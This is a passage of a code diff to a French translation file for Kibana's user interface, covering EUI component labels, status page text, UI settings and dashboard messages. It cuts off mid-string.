"core.euiColumnSortingDraggable.defaultSortAsc": "A-Z", "core.euiColumnSortingDraggable.defaultSortDesc": "Z-A", - "core.euiColumnSortingDraggable.removeSortLabel": "Retirer {display} du tri de la grille de données", - "core.euiColumnSortingDraggable.toggleLegend": "Sélectionner la méthode de tri pour {display}", + "core.euiColumnSortingDraggable.dragHandleAriaLabel": "Faire glisser la poignée", "core.euiComboBox.listboxAriaLabel": "Faites votre choix parmi les options suivantes", "core.euiComboBoxOptionsList.allOptionsSelected": "Vous avez sélectionné toutes les options disponibles.", - "core.euiComboBoxOptionsList.alreadyAdded": "{label} a déjà été ajouté.", - "core.euiComboBoxOptionsList.createCustomOption": "Ajouter {searchValue} en tant qu'option personnalisée", - "core.euiComboBoxOptionsList.delimiterMessage": "Ajouter chaque élément en séparant par {delimiter}", "core.euiComboBoxOptionsList.loadingOptions": "Options de chargement", "core.euiComboBoxOptionsList.noAvailableOptions": "Aucune option n’est disponible.", - "core.euiComboBoxOptionsList.noMatchingOptions": "{searchValue} ne correspond à aucune option.", - "core.euiComboBoxPill.removeSelection": "Supprimer {children} de la sélection de ce groupe", "core.euiCommonlyUsedTimeRanges.legend": "Couramment utilisées", - "core.euiControlBar.customScreenReaderAnnouncement": "Il y a un nouveau repère de région nommé {landmarkHeading} avec des commandes de niveau de page à la fin du document.", "core.euiControlBar.screenReaderAnnouncement": "Il y a un nouveau repère de région avec des commandes de niveau de page à la fin du document.", "core.euiControlBar.screenReaderHeading": "Commandes de niveau de page", - "core.euiDataGrid.ariaLabel": "{label} ; page {page} sur {pageCount}.", - "core.euiDataGrid.ariaLabelledBy": "Page {page} sur {pageCount}.", "core.euiDataGrid.screenReaderNotice": "Cette cellule contient du contenu interactif.", "core.euiDataGridCellActions.expandButtonTitle": "Cliquez ou appuyez sur Entrée pour interagir avec le contenu de la cellule.", + "core.euiDataGridHeaderCell.actionsPopoverScreenReaderText": "Pour naviguer dans la liste des actions de la colonne, appuyez sur la touche Tab ou sur les flèches vers le haut et vers le bas.", "core.euiDataGridHeaderCell.headerActions": "Actions d'en-tête", - "core.euiDataGridPagination.detailedPaginationLabel": "Pagination pour la grille précédente : {label}", "core.euiDataGridPagination.paginationLabel": "Pagination pour la grille précédente", "core.euiDataGridSchema.booleanSortTextAsc": "Faux-Vrai", "core.euiDataGridSchema.booleanSortTextDesc": "Vrai-Faux", @@ -1454,8 +612,6 @@ "core.euiDataGridSchema.jsonSortTextDesc": "Grand-Petit", "core.euiDataGridSchema.numberSortTextAsc": "Bas-Haut", "core.euiDataGridSchema.numberSortTextDesc": "Haut-Bas", - "core.euiDatePopoverButton.invalidTitle": "Date non valide : {title}", - "core.euiDatePopoverButton.outdatedTitle": "Mise à jour requise : {title}", "core.euiDatePopoverContent.absoluteTabLabel": "Absolue", "core.euiDatePopoverContent.endDateLabel": "Date de fin", "core.euiDatePopoverContent.nowTabButtonEnd": "Définir les date et heure de fin sur Maintenant", @@ -1477,13 +633,10 @@ "core.euiDisplaySelector.rowHeightLabel": "Hauteur de la ligne", "core.euiErrorBoundary.error": "Erreur", "core.euiFieldPassword.maskPassword": "Masquer le mot de passe", - "core.euiFieldPassword.showPassword": "Afficher le mot de passe en texte brut. Remarque : votre mot de passe sera visible à l'écran.", + "core.euiFieldPassword.showPassword": "Afficher le mot de passe en texte brut. Remarque : votre mot de passe sera visible à l'écran.", "core.euiFilePicker.clearSelectedFiles": "Effacer les fichiers sélectionnés", - "core.euiFilePicker.filesSelected": "{fileCount} fichiers sélectionnés", "core.euiFilePicker.promptText": "Sélectionner ou glisser-déposer un fichier", "core.euiFilePicker.removeSelected": "Supprimer", - "core.euiFilterButton.filterBadgeActiveAriaLabel": "{count} filtres actifs", - "core.euiFilterButton.filterBadgeAvailableAriaLabel": "{count} filtres disponibles", "core.euiFlyout.closeAriaLabel": "Fermer cette boîte de dialogue", "core.euiForm.addressFormErrors": "Veuillez remédier aux erreurs signalées en surbrillance.", "core.euiFormControlLayoutClearButton.label": "Effacer l'entrée", @@ -1491,10 +644,11 @@ "core.euiFullscreenSelector.fullscreenButtonActive": "Quitter le mode plein écran", "core.euiHeaderLinks.appNavigation": "Menu de l'application", "core.euiHeaderLinks.openNavigationMenu": "Ouvrir le menu", - "core.euiHue.label": "Sélectionner la valeur \"hue\" du mode de couleur HSV", + "core.euiHue.label": "Sélectionner la valeur \"hue\" du mode de couleur HSV", "core.euiLink.external.ariaLabel": "Lien externe", "core.euiLink.newTarget.screenReaderOnlyText": "(s’ouvre dans un nouvel onglet ou une nouvelle fenêtre)", "core.euiLoadingChart.ariaLabel": "Chargement", + "core.euiLoadingStrings.ariaLabel": "Chargement", "core.euiMark.highlightEnd": "mettre la fin en surbrillance", "core.euiMark.highlightStart": "mettre le début en surbrillance", "core.euiMarkdownEditorFooter.closeButton": "Fermer", @@ -1503,7 +657,6 @@ "core.euiMarkdownEditorFooter.openUploadModal": "Activer le mode de chargement de fichiers", "core.euiMarkdownEditorFooter.showMarkdownHelp": "Afficher l'aide de Markdown", "core.euiMarkdownEditorFooter.showSyntaxErrors": "Afficher les erreurs", - "core.euiMarkdownEditorFooter.supportedFileTypes": "Fichiers pris en charge : {supportedFileTypes}", "core.euiMarkdownEditorFooter.syntaxModalDescriptionPrefix": "Cet éditeur utilise", "core.euiMarkdownEditorFooter.syntaxModalDescriptionSuffix": "Vous pouvez également utiliser ces plug-ins de syntaxe supplémentaires pour enrichir votre texte.", "core.euiMarkdownEditorFooter.syntaxPopoverDescription": "Cet éditeur utilise", @@ -1513,28 +666,16 @@ "core.euiMarkdownEditorToolbar.editor": "Éditeur", "core.euiMarkdownEditorToolbar.previewMarkdown": "Aperçu", "core.euiModal.closeModal": "Ferme cette fenêtre modale.", - "core.euiNotificationEventMessages.accordionAriaLabelButtonText": "+ {messagesLength} messages pour {eventName}", - "core.euiNotificationEventMessages.accordionButtonText": "+ {messagesLength} de plus", "core.euiNotificationEventMessages.accordionHideText": "masquer", - "core.euiNotificationEventMeta.contextMenuButton": "Menu pour {eventName}", "core.euiNotificationEventReadButton.markAsRead": "Marquer comme lu", - "core.euiNotificationEventReadButton.markAsReadAria": "Marquer {eventName} comme lu", "core.euiNotificationEventReadButton.markAsUnread": "Marquer comme non lu", - "core.euiNotificationEventReadButton.markAsUnreadAria": "Marquer {eventName} comme non lu", - "core.euiNotificationEventReadIcon.read": "Lu", - "core.euiNotificationEventReadIcon.readAria": "{eventName} lu", + "core.euiNotificationEventReadIcon.read": "Lire", "core.euiNotificationEventReadIcon.unread": "Non lu", - "core.euiNotificationEventReadIcon.unreadAria": "{eventName} non lu", "core.euiPagination.collection": "collection", - "core.euiPagination.firstRangeAriaLabel": "Ignorer les pages 2 à {lastPage}", "core.euiPagination.fromEndLabel": "à partir de la fin", "core.euiPagination.last": "Dernier", - "core.euiPagination.lastRangeAriaLabel": "Ignorer les pages {firstPage} à {lastPage}", "core.euiPagination.of": "de", "core.euiPagination.page": "Page", - "core.euiPagination.pageOfTotalCompressed": "{page} sur {total}", - "core.euiPaginationButton.longPageString": "Page {page} sur {totalPages}", - "core.euiPaginationButton.shortPageString": "Page {page}", "core.euiPaginationButtonArrow.firstPage": "Première page", "core.euiPaginationButtonArrow.lastPage": "Dernière page", "core.euiPaginationButtonArrow.nextPage": "Page suivante", @@ -1542,42 +683,10 @@ "core.euiPinnableListGroup.pinExtraActionLabel": "Épingler l'élément", "core.euiPinnableListGroup.pinnedExtraActionLabel": "Désépingler l'élément", "core.euiPopover.screenReaderAnnouncement": "Il s’agit d’une boîte de dialogue. Appuyez sur Échap pour quitter.", - "core.euiPrettyDuration.durationRoundedToDay": "{prettyDuration} arrondie au jour", - "core.euiPrettyDuration.durationRoundedToHour": "{prettyDuration} arrondie à l'heure", - "core.euiPrettyDuration.durationRoundedToMinute": "{prettyDuration} arrondie à la minute", - "core.euiPrettyDuration.durationRoundedToMonth": "{prettyDuration} arrondie au mois", - "core.euiPrettyDuration.durationRoundedToSecond": "{prettyDuration} arrondie à la seconde", - "core.euiPrettyDuration.durationRoundedToWeek": "{prettyDuration} arrondie à la semaine", - "core.euiPrettyDuration.durationRoundedToYear": "{prettyDuration} arrondie à l'année", - "core.euiPrettyDuration.fallbackDuration": "{displayFrom} à {displayTo}", "core.euiPrettyDuration.invalid": "Date non valide", - "core.euiPrettyDuration.lastDurationDays": "{duration, plural, one {# dernier jour} other {# derniers jours}}", - "core.euiPrettyDuration.lastDurationHours": "{duration, plural, one {# dernière heure} other {# dernières heures}}", - "core.euiPrettyDuration.lastDurationMinutes": "{duration, plural, one {# dernière minute} other {# dernières minutes}}", - "core.euiPrettyDuration.lastDurationMonths": "{duration, plural, one {# dernier mois} other {# derniers mois}}", - "core.euiPrettyDuration.lastDurationSeconds": "{duration, plural, one {# dernière seconde} other {# dernières secondes}}", - "core.euiPrettyDuration.lastDurationWeeks": "{duration, plural, one {# dernière semaine} other {# dernières semaines}}", - "core.euiPrettyDuration.lastDurationYears": "{duration, plural, one {# dernière année} other {# dernières années}}", - "core.euiPrettyDuration.nextDurationHours": "{duration, plural, one {# prochaine heure} other {# prochaines heures}}", - "core.euiPrettyDuration.nextDurationMinutes": "{duration, plural, one {# prochaine minute} other {# prochaines minutes}}", - "core.euiPrettyDuration.nextDurationMonths": "{duration, plural, one {# prochain mois} other {# prochains mois}}", - "core.euiPrettyDuration.nextDurationSeconds": "{duration, plural, one {# prochaine seconde} other {# prochaines secondes}}", - "core.euiPrettyDuration.nextDurationWeeks": "{duration, plural, one {# prochaine semaine} other {# prochaines semaines}}", - "core.euiPrettyDuration.nextDurationYears": "{duration, plural, one {# prochaine année} other {# prochaines années}}", - "core.euiPrettyDuration.nexttDurationDays": "{duration, plural, one {# prochain jour} other {# prochains jours}}", "core.euiPrettyDuration.now": "maintenant", - "core.euiPrettyInterval.days": "{interval, plural, one {# jour} other {# jours}}", - "core.euiPrettyInterval.daysShorthand": "{interval} d", - "core.euiPrettyInterval.hours": "{interval, plural, one {# heure} other {# heures}}", - "core.euiPrettyInterval.hoursShorthand": "{interval} h", - "core.euiPrettyInterval.minutes": "{interval, plural, one {# minute} other {# minutes}}", - "core.euiPrettyInterval.minutesShorthand": "{interval} m", "core.euiPrettyInterval.off": "Désactivé", - "core.euiPrettyInterval.seconds": "{interval, plural, one {# seconde} other {# secondes}}", - "core.euiPrettyInterval.secondsShorthand": "{interval} s", - "core.euiProgress.valueText": "{value} %", "core.euiQuickSelect.applyButton": "Appliquer", - "core.euiQuickSelect.fullDescription": "Actuellement défini sur {timeTense} {timeValue} {timeUnit}.", "core.euiQuickSelect.legendText": "Sélection rapide d’une plage temporelle", "core.euiQuickSelect.nextLabel": "Fenêtre temporelle suivante", "core.euiQuickSelect.previousLabel": "Fenêtre temporelle précédente", @@ -1586,25 +695,20 @@ "core.euiQuickSelect.unitLabel": "Unité de temps", "core.euiQuickSelect.valueLabel": "Valeur de temps", "core.euiRecentlyUsed.legend": "Plages de dates récemment utilisées", - "core.euiRefreshInterval.fullDescriptionOff": "L'actualisation est désactivée, intervalle défini sur {optionValue} {optionText}.", - "core.euiRefreshInterval.fullDescriptionOn": "L'actualisation est activée, intervalle défini sur {optionValue} {optionText}.", "core.euiRefreshInterval.legend": "Actualiser toutes les", "core.euiRelativeTab.dateInputError": "Doit être une plage valide", - "core.euiRelativeTab.fullDescription": "L'unité peut être modifiée. Elle est actuellement définie sur {unit}.", - "core.euiRelativeTab.numberInputError": "Doit être >= 0.", + "core.euiRelativeTab.numberInputError": "Doit être >= 0.", "core.euiRelativeTab.numberInputLabel": "Nombre d'intervalles", "core.euiRelativeTab.unitInputLabel": "Intervalle relatif", "core.euiResizableButton.horizontalResizerAriaLabel": "Utilisez les flèches gauche et droite pour ajuster la taille des panneaux.", "core.euiResizableButton.verticalResizerAriaLabel": "Utilisez les flèches vers le haut et vers le bas pour ajuster la taille des panneaux.", "core.euiResizablePanel.toggleButtonAriaLabel": "Appuyez pour afficher/masquer ce panneau.", - "core.euiSaturation.ariaLabel": "Curseur à 2 axes de valeur et de saturation du mode de couleur HSV", - "core.euiSaturation.screenReaderInstructions": "Utilisez les touches fléchées pour parcourir le dégradé de couleurs. Les coordonnées seront utilisées pour calculer les chiffres de \"valeur\" et de \"saturation\" du mode de couleur HSV, dans une plage de 0 à 1. Les flèches gauche et droite permettent de modifier la saturation. Les flèches vers le haut et vers le bas permettent de modifier la valeur.", + "core.euiSaturation.ariaLabel": "Curseur à 2 axes de valeur et de saturation du mode de couleur HSV", + "core.euiSaturation.screenReaderInstructions": "Utilisez les touches fléchées pour parcourir le dégradé de couleurs. Les coordonnées seront utilisées pour calculer les chiffres de \"valeur\" et de \"saturation\" du mode de couleur HSV, dans une plage de 0 à 1. Les flèches gauche et droite permettent de modifier la saturation. Les flèches vers le haut et vers le bas permettent de modifier la valeur.", "core.euiSelectable.loadingOptions": "Options de chargement", "core.euiSelectable.noAvailableOptions": "Aucune option disponible", - "core.euiSelectable.noMatchingOptions": "{searchValue} ne correspond à aucune option.", "core.euiSelectable.placeholderName": "Options de filtre", "core.euiSelectable.screenReaderInstructions": "Utilisez les flèches vers le haut et vers le bas pour déplacer la mise au point sur les options. Appuyez sur Entrée pour sélectionner. Appuyez sur Échap pour réduire les options.", - "core.euiSelectable.searchResults": "{resultsLength, plural, one {# résultat disponible} other {#résultats disponibles}}", "core.euiSelectableListItem.checkedOption": "Option cochée.", "core.euiSelectableListItem.checkedOptionInstructions": "Pour décocher cette option, appuyez sur Entrée.", "core.euiSelectableListItem.excludedOption": "Option exclue.", @@ -1617,39 +721,20 @@ "core.euiSelectableTemplateSitewide.onFocusBadgeGoTo": "Atteindre", "core.euiSelectableTemplateSitewide.searchPlaceholder": "Rechercher tout...", "core.euiStat.loadingText": "Statistiques en cours de chargement", - "core.euiStepStrings.complete": "L'étape {number} : {title} est terminée.", - "core.euiStepStrings.current": "L’étape {number} : {title} est en cours.", - "core.euiStepStrings.disabled": "L'étape {number} : {title} est désactivée.", - "core.euiStepStrings.errors": "L'étape {number} : {title} contient des erreurs.", - "core.euiStepStrings.incomplete": "L'étape {number} : {title} est incomplète.", - "core.euiStepStrings.loading": "L'étape {number} : {title} est en cours de chargement.", - "core.euiStepStrings.simpleComplete": "L'étape {number} est terminée.", - "core.euiStepStrings.simpleCurrent": "L’étape {number} est en cours.", - "core.euiStepStrings.simpleDisabled": "L'étape {number} est désactivée.", - "core.euiStepStrings.simpleErrors": "L'étape {number} contient des erreurs.", - "core.euiStepStrings.simpleIncomplete": "L'étape {number} est incomplète.", - "core.euiStepStrings.simpleLoading": "L'étape {number} est en cours de chargement.", - "core.euiStepStrings.simpleStep": "Étape {number}", - "core.euiStepStrings.simpleWarning": "L'étape {number} contient des avertissements.", - "core.euiStepStrings.step": "Étape {number} : {title}", - "core.euiStepStrings.warning": "L'étape {number} : {title} contient des avertissements.", - "core.euiSuggest.stateLoading": "État : chargement.", - "core.euiSuggest.stateSaved": "État : enregistré.", + "core.euiSuggest.stateLoading": "État : chargement.", + "core.euiSuggest.stateSaved": "État : enregistré.", "core.euiSuggest.stateSavedTooltip": "Enregistré.", - "core.euiSuggest.stateUnchanged": "État : non modifié.", - "core.euiSuggest.stateUnsaved": "État : non enregistré.", + "core.euiSuggest.stateUnchanged": "État : non modifié.", + "core.euiSuggest.stateUnsaved": "État : non enregistré.", "core.euiSuggest.stateUnsavedTooltip": "Les modifications n'ont pas été enregistrées.", "core.euiSuperSelect.screenReaderAnnouncement": "Vous êtes dans un sélecteur de formulaires et vous devez sélectionner une seule option. Utilisez les flèches vers le haut et vers le bas pour naviguer, ou appuyez sur Échap pour fermer.", - "core.euiSuperSelectControl.selectAnOption": "Sélectionner une option : l’option {selectedValue} est sélectionnée.", "core.euiSuperUpdateButton.cannotUpdateTooltip": "Mise à jour impossible", "core.euiSuperUpdateButton.clickToApplyTooltip": "Cliquer pour appliquer", "core.euiSuperUpdateButton.refreshButtonLabel": "Actualiser", "core.euiSuperUpdateButton.updateButtonLabel": "Mettre à jour", "core.euiSuperUpdateButton.updatingButtonLabel": "Mise à jour", - "core.euiTableHeaderCell.titleTextWithDesc": "{innerText} ; {description}", "core.euiTablePagination.allRows": "Affichage de toutes les lignes", "core.euiTablePagination.rowsPerPage": "Lignes par page", - "core.euiTablePagination.rowsPerPageOption": "{rowsPerPage} lignes", "core.euiTablePagination.rowsPerPageOptionShowAllRows": "Afficher toutes les lignes", "core.euiTableSortMobile.sorting": "Tri", "core.euiTimeOptions.days": "Jours", @@ -1696,11 +781,9 @@ "core.euiTourStep.closeTour": "Fermer la visite", "core.euiTourStep.endTour": "Terminer la visite", "core.euiTourStep.skipTour": "Ignorer la visite", - "core.euiTourStepIndicator.ariaLabel": "Étape {number} {status}", "core.euiTourStepIndicator.isActive": "active", "core.euiTourStepIndicator.isComplete": "terminée", "core.euiTourStepIndicator.isIncomplete": "incomplète", - "core.euiTreeView.ariaLabel": "{nodeLabel} enfant de {ariaLabel}", "core.euiTreeView.listNavigationInstructions": "Utilisez les touches fléchées pour parcourir rapidement cette liste.", "core.fatalErrors.clearYourSessionButtonLabel": "Effacer votre session", "core.fatalErrors.goBackButtonLabel": "Retour", @@ -1711,14 +794,12 @@ "core.notifications.unableUpdateUISettingNotificationMessageTitle": "Impossible de mettre à jour le paramètre de l'interface utilisateur", "core.savedObjects.deprecations.unknownTypes.manualSteps.1": "Activez les plug-ins désactivés, puis redémarrez Kibana.", "core.savedObjects.deprecations.unknownTypes.manualSteps.2": "Si aucun plug-in n'est désactivé ou si leur activation ne résout pas le problème, supprimez les documents.", - "core.savedObjects.deprecations.unknownTypes.message": "{objectCount, plural, one {# objet} other {# objets}} de type inconnu {objectCount, plural, one {a été trouvé} other {ont été trouvés}} dans les indices du système Kibana. La mise à niveau avec des types savedObject inconnus n'est plus compatible. Pour assurer la réussite des mises à niveau à l'avenir, réactivez les plug-ins ou supprimez ces documents dans les indices de Kibana", "core.savedObjects.deprecations.unknownTypes.title": "Des objets enregistrés avec des types inconnus sont présents dans les indices du système Kibana", "core.status.greenTitle": "Vert", "core.status.redTitle": "Rouge", "core.status.yellowTitle": "Jaune", "core.statusPage.coreStatus.sectionTitle": "Statut principal", - "core.statusPage.loadStatus.serverIsDownErrorMessage": "Échec de requête du statut du serveur. Votre serveur est peut-être indisponible ?", - "core.statusPage.loadStatus.serverStatusCodeErrorMessage": "Échec de requête du statut du serveur avec le code de statut {responseStatus}.", + "core.statusPage.loadStatus.serverIsDownErrorMessage": "Échec de requête du statut du serveur. Votre serveur est peut-être indisponible ?", "core.statusPage.metricsTiles.columns.heapTotalHeader": "Tas total", "core.statusPage.metricsTiles.columns.heapUsedHeader": "Tas utilisé", "core.statusPage.metricsTiles.columns.load.metaHeader": "Intervalle de charge", @@ -1728,11 +809,7 @@ "core.statusPage.metricsTiles.columns.requestsPerSecHeader": "Requêtes par seconde", "core.statusPage.metricsTiles.columns.resTimeAvgHeader": "Temps de réponse moyen", "core.statusPage.metricsTiles.columns.resTimeMaxHeader": "Temps de réponse max.", - "core.statusPage.serverStatus.statusTitle": "Statut Kibana : {kibanaStatus}", "core.statusPage.statusApp.loadingErrorText": "Une erreur s'est produite lors du chargement du statut.", - "core.statusPage.statusApp.statusActions.buildText": "BUILD : {buildNum}", - "core.statusPage.statusApp.statusActions.commitText": "COMMIT : {buildSha}", - "core.statusPage.statusApp.statusActions.versionText": "VERSION : {versionNum}", "core.statusPage.statusApp.statusTitle": "Statut du plug-in", "core.statusPage.statusTable.columns.expandRow.collapseLabel": "Réduire", "core.statusPage.statusTable.columns.expandRow.expandLabel": "Développer", @@ -1746,27 +823,23 @@ "core.ui_settings.params.dateFormat.dayOfWeekText": "Le premier jour de la semaine", "core.ui_settings.params.dateFormat.dayOfWeekTitle": "Jour de la semaine", "core.ui_settings.params.dateFormat.optionsLinkText": "format", - "core.ui_settings.params.dateFormat.scaled.intervalsLinkText": "Intervalles ISO8601", - "core.ui_settings.params.dateFormat.scaledText": "Les valeurs qui définissent le format utilisé lorsque les données temporelles sont rendues dans l'ordre, et lorsque les horodatages formatés doivent s'adapter à l'intervalle entre les mesures. Les clés sont {intervalsLink}.", + "core.ui_settings.params.dateFormat.scaled.intervalsLinkText": "Intervalles ISO8601", "core.ui_settings.params.dateFormat.scaledTitle": "Format de date scalé", - "core.ui_settings.params.dateFormat.timezone.invalidValidationMessage": "Fuseau horaire non valide : {timezone}", "core.ui_settings.params.dateFormat.timezoneText": "Le fuseau horaire par défaut.", "core.ui_settings.params.dateFormat.timezoneTitle": "Fuseau horaire", - "core.ui_settings.params.dateFormatText": "Le {formatLink} pour des dates joliment formatées.", "core.ui_settings.params.dateFormatTitle": "Format de date", - "core.ui_settings.params.dateNanosFormatText": "Le format pour les données {dateNanosLink}.", "core.ui_settings.params.dateNanosFormatTitle": "Date au format nanosecondes", "core.ui_settings.params.dateNanosLinkTitle": "date_nanos", - "core.ui_settings.params.dayOfWeekText.invalidValidationMessage": "Jour de la semaine non valide : {dayOfWeek}", "core.ui_settings.params.defaultRoute.defaultRouteIsRelativeValidationMessage": "Doit être une URL relative.", "core.ui_settings.params.defaultRoute.defaultRouteText": "Ce paramètre spécifie le chemin par défaut lors de l'ouverture de Kibana. Vous pouvez utiliser ce paramètre pour modifier la page de destination à l'ouverture de Kibana. Le chemin doit être une URL relative.", "core.ui_settings.params.defaultRoute.defaultRouteTitle": "Chemin par défaut", "core.ui_settings.params.disableAnimationsText": "Désactivez toutes les animations non nécessaires dans l'interface utilisateur de Kibana. Actualisez la page pour appliquer les modifications.", "core.ui_settings.params.disableAnimationsTitle": "Désactiver les animations", + "core.ui_settings.params.hideAnnouncements": "Masquer les annonces", + "core.ui_settings.params.hideAnnouncementsText": "Arrêtez d’afficher les messages et les visites guidées qui mettent en avant les nouvelles fonctionnalités.", "core.ui_settings.params.notifications.banner.markdownLinkText": "Markdown pris en charge", "core.ui_settings.params.notifications.bannerLifetimeText": "La durée en millisecondes durant laquelle une notification de bannière s'affiche à l'écran. ", "core.ui_settings.params.notifications.bannerLifetimeTitle": "Durée des notifications de bannière", - "core.ui_settings.params.notifications.bannerText": "Une bannière personnalisée à des fins de notification temporaire de l’ensemble des utilisateurs. {markdownLink}.", "core.ui_settings.params.notifications.bannerTitle": "Notification de bannière personnalisée", "core.ui_settings.params.notifications.errorLifetimeText": "La durée en millisecondes durant laquelle une notification d'erreur s'affiche à l'écran. ", "core.ui_settings.params.notifications.errorLifetimeTitle": "Durée des notifications d'erreur", @@ -1781,23 +854,19 @@ "core.ui.chrome.headerGlobalNav.helpMenuAskElasticTitle": "Questions Elastic", "core.ui.chrome.headerGlobalNav.helpMenuButtonAriaLabel": "Menu d'aide", "core.ui.chrome.headerGlobalNav.helpMenuDocumentation": "Documentation", - "core.ui.chrome.headerGlobalNav.helpMenuGiveFeedbackOnApp": "Donner un retour sur {appName}", "core.ui.chrome.headerGlobalNav.helpMenuGiveFeedbackTitle": "Donner un retour", "core.ui.chrome.headerGlobalNav.helpMenuKibanaDocumentationTitle": "Documentation Kibana", "core.ui.chrome.headerGlobalNav.helpMenuOpenGitHubIssueTitle": "Ouvrir un ticket dans GitHub", "core.ui.chrome.headerGlobalNav.helpMenuTitle": "Aide", - "core.ui.chrome.headerGlobalNav.helpMenuVersion": "v {version}", "core.ui.chrome.headerGlobalNav.logoAriaLabel": "Logo Elastic", - "core.ui.enterpriseSearchNavList.label": "Enterprise Search", - "core.ui.errorUrlOverflow.bigUrlWarningNotificationMessage": "Activez l'option {storeInSessionStorageParam} dans les {advancedSettingsLink} ou simplifiez les visuels à l'écran.", + "core.ui.enterpriseSearchNavList.label": "Enterprise Search", "core.ui.errorUrlOverflow.bigUrlWarningNotificationMessage.advancedSettingsLinkText": "paramètres avancés", "core.ui.errorUrlOverflow.bigUrlWarningNotificationTitle": "L'URL est longue et Kibana pourrait cesser de fonctionner.", "core.ui.errorUrlOverflow.errorTitle": "L'URL pour cet objet est trop longue, et nous ne pouvons pas l'afficher.", "core.ui.errorUrlOverflow.optionsToFixError.doNotUseIEText": "Veuillez utiliser un navigateur moderne. Tous les autres navigateurs pris en charge connus n'ont pas cette limitation.", - "core.ui.errorUrlOverflow.optionsToFixError.enableOptionText": "Activez l'option {storeInSessionStorageConfig} sous {kibanaSettingsLink}.", "core.ui.errorUrlOverflow.optionsToFixError.enableOptionText.advancedSettingsLinkText": "Paramètres avancés", "core.ui.errorUrlOverflow.optionsToFixError.removeStuffFromDashboardText": "Simplifiez l'objet en cours de modification en supprimant du contenu ou des filtres.", - "core.ui.errorUrlOverflow.optionsToFixErrorDescription": "À essayer :", + "core.ui.errorUrlOverflow.optionsToFixErrorDescription": "À essayer :", "core.ui.kibanaNavList.label": "Analytique", "core.ui.legacyBrowserMessage": "Cette installation Elastic présente des exigences de sécurité strictes auxquelles votre navigateur ne satisfait pas.", "core.ui.legacyBrowserTitle": "Merci de mettre votre navigateur à niveau.", @@ -1810,19 +879,16 @@ "core.ui.primaryNav.pinnedLinksAriaLabel": "Liens épinglés", "core.ui.primaryNav.screenReaderLabel": "Principale", "core.ui.primaryNav.toggleNavAriaLabel": "Activer/Désactiver la navigation principale", - "core.ui.primaryNavSection.screenReaderLabel": "Liens de navigation principale, {category}", - "core.ui.publicBaseUrlWarning.configRecommendedDescription": "Dans un environnement de production, il est recommandé de configurer {configKey}.", "core.ui.publicBaseUrlWarning.configRecommendedTitle": "Configuration recommandée", "core.ui.publicBaseUrlWarning.learnMoreLinkLabel": "En savoir plus.", "core.ui.publicBaseUrlWarning.muteWarningButtonLabel": "Avertissement de mise sur Muet", - "core.ui.recentLinks.linkItem.screenReaderLabel": "{recentlyAccessedItemLinklabel}, type : {pageType}", "core.ui.recentlyViewed": "Récemment consulté", "core.ui.recentlyViewedAriaLabel": "Liens récemment consultés", "core.ui.securityNavList.label": "Security", "core.ui.welcomeErrorMessage": "Elastic ne s'est pas chargé correctement. Vérifiez la sortie du serveur pour plus d'informations.", "core.ui.welcomeMessage": "Chargement d'Elastic", - "customIntegrations.components.replacementAccordion.comparisonPageLinkLabel": "page de comparaison", "customIntegrations.components.replacementAccordion.recommendationDescription": "Les intégrations d'Elastic Agent sont recommandées, mais vous pouvez également utiliser Beats. Pour plus de détails, consultez notre {link}.", + "customIntegrations.components.replacementAccordion.comparisonPageLinkLabel": "page de comparaison", "customIntegrations.components.replacementAccordionLabel": "Également disponible dans Beats", "customIntegrations.languageclients.DotNetDescription": "Indexez les données dans Elasticsearch avec le client .NET.", "customIntegrations.languageclients.DotNetTitle": "Client .NET Elasticsearch", @@ -1844,14 +910,32 @@ "customIntegrations.languageclients.RustTitle": "Client Rust Elasticsearch", "customIntegrations.placeholders.EsfDescription": "Collectez les logs à l'aide de l'application AWS Lambda disponible dans AWS Serverless Application Repository.", "customIntegrations.placeholders.EsfTitle": "AWS Serverless Application Repository", - "dashboard.actions.DownloadCreateDrilldownAction.displayName": "Télécharger au format CSV", + "dashboard.addPanel.savedObjectAddedToContainerSuccessMessageTitle": "{savedObjectName} a été ajouté.", + "dashboard.dashboardWasNotSavedDangerMessage": "Le tableau de bord \"{dashTitle}\" n'a pas été enregistré. Erreur : {errorMessage}.", + "dashboard.listing.createNewDashboard.newToKibanaDescription": "Vous êtes nouveau sur Kibana ? {sampleDataInstallLink} pour découvrir l'application.", + "dashboard.listing.unsaved.discardAria": "Ignorer les modifications apportées à {title}", + "dashboard.listing.unsaved.editAria": "Poursuivre les modifications apportées à {title}", + "dashboard.listing.unsaved.unsavedChangesTitle": "Vous avez des modifications non enregistrées dans le {dash} suivant :", + "dashboard.loadingError.errorMessage": "Erreur rencontrée lors du chargement du tableau de bord enregistré : {message}", + "dashboard.noMatchRoute.bannerText": "L'application de tableau de bord ne reconnaît pas ce chemin : {route}.", + "dashboard.panel.addToLibrary.successMessage": "Le panneau {panelTitle} a été ajouté à la bibliothèque Visualize.", + "dashboard.panel.unableToMigratePanelDataForSixThreeZeroErrorMessage": "Impossible de migrer les données du panneau pour une rétro-compatibilité \"6.3.0\". Le panneau ne contient pas le champ attendu : {key}.", + "dashboard.panel.unlinkFromLibrary.successMessage": "Le panneau {panelTitle} n'est plus connecté à la bibliothèque Visualize.", + "dashboard.panelStorageError.clearError": "Une erreur s'est produite lors de la suppression des modifications non enregistrées : {message}.", + "dashboard.panelStorageError.getError": "Une erreur s'est produite lors de la récupération des modifications non enregistrées : {message}.", + "dashboard.panelStorageError.setError": "Une erreur s'est produite lors de la définition des modifications non enregistrées : {message}.", + "dashboard.share.defaultDashboardTitle": "Tableau de bord [{date}]", + "dashboard.strings.dashboardEditTitle": "Modification de {title}", + "dashboard.topNav.cloneModal.dashboardExistsDescription": "Cliquez sur {confirmClone} pour cloner le tableau de bord avec le titre dupliqué.", + "dashboard.topNav.cloneModal.dashboardExistsTitle": "Un tableau de bord nommé {newDashboardName} existe déjà.", + "dashboard.topNav.showCloneModal.dashboardCopyTitle": "Copie de {title}", + "dashboard.actions.DownloadCreateDrilldownAction.displayName": "Télécharger au format CSV", "dashboard.actions.downloadOptionsUnsavedFilename": "sans titre", "dashboard.actions.toggleExpandPanelMenuItem.expandedDisplayName": "Minimiser", "dashboard.actions.toggleExpandPanelMenuItem.notExpandedDisplayName": "Maximiser le panneau", "dashboard.addPanel.noMatchingObjectsMessage": "Aucun objet correspondant trouvé.", - "dashboard.addPanel.savedObjectAddedToContainerSuccessMessageTitle": "{savedObjectName} a été ajouté.", "dashboard.appLeaveConfirmModal.cancelButtonLabel": "Annuler", - "dashboard.appLeaveConfirmModal.unsavedChangesSubtitle": "Quitter le tableau de bord sans enregistrer ?", + "dashboard.appLeaveConfirmModal.unsavedChangesSubtitle": "Quitter le tableau de bord sans enregistrer 